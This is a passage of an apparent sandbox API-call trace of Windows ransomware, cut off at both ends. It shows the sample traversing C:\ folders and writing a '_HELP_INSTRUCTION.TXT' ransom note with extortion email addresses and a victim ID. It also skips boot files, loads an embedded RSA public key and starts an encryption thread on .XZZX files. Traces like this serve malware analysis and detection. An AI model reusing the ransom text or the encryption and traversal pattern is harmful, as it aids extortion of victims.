possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0160.856] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0160.856] CreateFileW (lpFileName="C:\\Program Files\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\program files\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0160.856] CloseHandle (hObject=0x1d4) returned 1 [0160.856] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0160.856] PathFindFileNameW (pszPath="C:\\Program Files") returned="Program Files" [0160.856] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files" | out: lpString1="Program Files") returned="Program Files" [0160.856] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 1 [0160.856] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.856] lstrcmpW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0160.856] lstrcmpW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0160.856] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.856] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.856] lstrcatW (in: lpString1="C:\\", lpString2="Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0160.856] SetErrorMode (uMode=0x1) returned 0x1 [0160.856] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0160.856] lstrcatW (in: lpString1="C:\\Program Files (x86)", lpString2="\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\" [0160.856] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Program Files (x86)\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\" [0160.856] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="*.*" | out: lpString1="C:\\Program Files (x86)\\*.*") returned="C:\\Program Files (x86)\\*.*" [0160.856] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0160.857] PathFindFileNameW (pszPath="C:\\Program Files (x86)") returned="Program Files (x86)" [0160.857] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files (x86)" | out: lpString1="Program Files (x86)") returned="Program Files (x86)" [0160.857] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 1 [0160.857] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0160.857] lstrcatW (in: lpString1="C:\\Program Files (x86)", lpString2="\\*.*" | out: lpString1="C:\\Program Files (x86)\\*.*") returned="C:\\Program Files (x86)\\*.*" [0160.857] SetErrorMode (uMode=0x1) returned 0x1 [0160.857] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Program Files (x86)\\_HELP_INSTRUCTION.TXT") returned 44 [0160.857] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0160.857] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0160.857] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1d4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x1d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb9df8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cb9df8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0160.857] RegCloseKey (hKey=0x1d4) returned 0x0 [0160.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0160.857] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0160.858] CreateFileW (lpFileName="C:\\Program Files (x86)\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\program files (x86)\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0160.858] CloseHandle (hObject=0x1d4) returned 1 [0160.858] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0160.858] PathFindFileNameW (pszPath="C:\\Program Files (x86)") returned="Program Files (x86)" [0160.858] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files (x86)" | out: lpString1="Program Files (x86)") returned="Program Files (x86)" [0160.858] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 1 [0160.858] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.858] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1 [0160.858] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1 [0160.858] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.858] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.858] lstrcatW (in: lpString1="C:\\", lpString2="ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0160.858] SetErrorMode (uMode=0x1) returned 0x1 [0160.858] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0160.858] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0160.858] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\ProgramData\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0160.858] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="*.*" | out: lpString1="C:\\ProgramData\\*.*") returned="C:\\ProgramData\\*.*" [0160.858] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0160.858] PathFindFileNameW (pszPath="C:\\ProgramData") returned="ProgramData" [0160.858] lstrcpyW (in: lpString1=0x17e824, lpString2="ProgramData" | out: lpString1="ProgramData") returned="ProgramData" [0160.858] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 1 [0160.859] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0160.859] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\*.*") returned="C:\\ProgramData\\*.*" [0160.859] SetErrorMode (uMode=0x1) returned 0x1 [0160.859] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\ProgramData\\_HELP_INSTRUCTION.TXT") returned 36 [0160.859] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0160.859] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0160.859] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1d4) returned 0x0 [0160.859] RegQueryValueExW (in: hKey=0x1d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cba028, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cba028*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0160.859] RegCloseKey (hKey=0x1d4) returned 0x0 [0160.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0160.859] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0160.859] CreateFileW (lpFileName="C:\\ProgramData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\programdata\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0160.859] CloseHandle (hObject=0x1d4) returned 1 [0160.860] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0160.860] PathFindFileNameW (pszPath="C:\\ProgramData") returned="ProgramData" [0160.860] lstrcpyW (in: lpString1=0x17e824, lpString2="ProgramData" | out: lpString1="ProgramData") returned="ProgramData" [0160.860] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 1 [0160.860] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.860] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0160.860] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0160.860] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.860] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.860] lstrcatW (in: lpString1="C:\\", lpString2="Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0160.860] SetErrorMode (uMode=0x1) returned 0x1 [0160.860] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0160.860] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0160.860] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Recovery\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0160.860] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="*.*" | out: lpString1="C:\\Recovery\\*.*") returned="C:\\Recovery\\*.*" [0160.860] FindFirstFileW (in: lpFileName="C:\\Recovery\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0160.861] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0160.861] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0160.861] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\*.*" | out: lpString1="C:\\Recovery\\*.*") returned="C:\\Recovery\\*.*" [0160.861] SetErrorMode (uMode=0x1) returned 0x1 [0160.861] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Recovery\\_HELP_INSTRUCTION.TXT") returned 33 [0160.861] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0160.861] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0160.861] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1d4) returned 0x0 [0160.862] RegQueryValueExW (in: hKey=0x1d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cba258, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cba258*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0160.862] RegCloseKey (hKey=0x1d4) returned 0x0 [0160.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0160.862] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0160.862] CreateFileW (lpFileName="C:\\Recovery\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\recovery\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.862] CreateFileW (lpFileName="C:\\Recovery\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\recovery\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.862] FindFirstFileW (in: lpFileName="C:\\Recovery\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0160.862] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0160.862] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.862] lstrcmpW (lpString1="System Volume Information", lpString2="..") returned 1 [0160.862] lstrcmpW (lpString1="System Volume Information", lpString2=".") returned 1 [0160.862] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.862] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.862] lstrcatW (in: lpString1="C:\\", lpString2="System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0160.862] SetErrorMode (uMode=0x1) returned 0x1 [0160.862] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0160.862] lstrcatW (in: lpString1="C:\\System Volume Information", lpString2="\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\" [0160.862] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\System Volume Information\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\" [0160.862] lstrcatW (in: lpString1="C:\\System Volume Information\\", lpString2="*.*" | out: lpString1="C:\\System Volume Information\\*.*") returned="C:\\System Volume Information\\*.*" [0160.862] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0160.862] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0160.862] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0160.862] lstrcatW (in: lpString1="C:\\System Volume Information", lpString2="\\*.*" | out: lpString1="C:\\System Volume Information\\*.*") returned="C:\\System Volume Information\\*.*" [0160.862] SetErrorMode (uMode=0x1) returned 0x1 [0160.862] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\System Volume Information\\_HELP_INSTRUCTION.TXT") returned 50 [0160.862] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0160.863] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0160.863] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1d4) returned 0x0 [0160.863] RegQueryValueExW (in: hKey=0x1d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cba488, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cba488*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0160.863] RegCloseKey (hKey=0x1d4) returned 0x0 [0160.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0160.863] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0160.863] CreateFileW (lpFileName="C:\\System Volume Information\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\system volume information\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.863] CreateFileW (lpFileName="C:\\System Volume Information\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\system volume information\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.863] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0160.863] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0160.863] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.863] lstrcmpW (lpString1="Users", lpString2="..") returned 1 [0160.863] lstrcmpW (lpString1="Users", lpString2=".") returned 1 [0160.863] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.863] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.863] lstrcatW (in: lpString1="C:\\", lpString2="Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0160.863] SetErrorMode (uMode=0x1) returned 0x1 [0160.863] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0160.863] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0160.863] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0160.863] lstrcatW (in: lpString1="C:\\Users\\", lpString2="*.*" | out: lpString1="C:\\Users\\*.*") returned="C:\\Users\\*.*" [0160.863] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0160.863] PathFindFileNameW (pszPath="C:\\Users") returned="Users" [0160.863] lstrcpyW (in: lpString1=0x17e824, lpString2="Users" | out: lpString1="Users") returned="Users" [0160.863] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0160.863] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0160.863] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0160.863] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0160.863] lstrcmpW (lpString1="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpString2="..") returned 1 [0160.863] lstrcmpW (lpString1="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpString2=".") returned 1 [0160.864] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0160.864] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="ntldr") returned 0x0 [0160.864] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="NTLDR") returned 0x0 [0160.864] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0160.864] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="ntdetect.com") returned 0x0 [0160.864] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\") returned 13 [0160.864] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\") [0160.864] lstrcpyA (in: lpString1=0x17ea5c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0160.864] lstrcpyW (in: lpString1=0x17f05c, lpString2="D2D9507033A5E4DB82B20D90383EC923.XZZX" | out: lpString1="D2D9507033A5E4DB82B20D90383EC923.XZZX") returned="D2D9507033A5E4DB82B20D90383EC923.XZZX" [0160.864] lstrcpyW (in: lpString1=0x17ec5c, lpString2="\\\\?\\C:\\Users\\" | out: lpString1="\\\\?\\C:\\Users\\") returned="\\\\?\\C:\\Users\\" [0160.864] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17ea5c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d8 [0160.864] Sleep (dwMilliseconds=0x96) [0161.028] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0161.028] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0161.029] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0161.029] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0161.029] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0161.029] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", 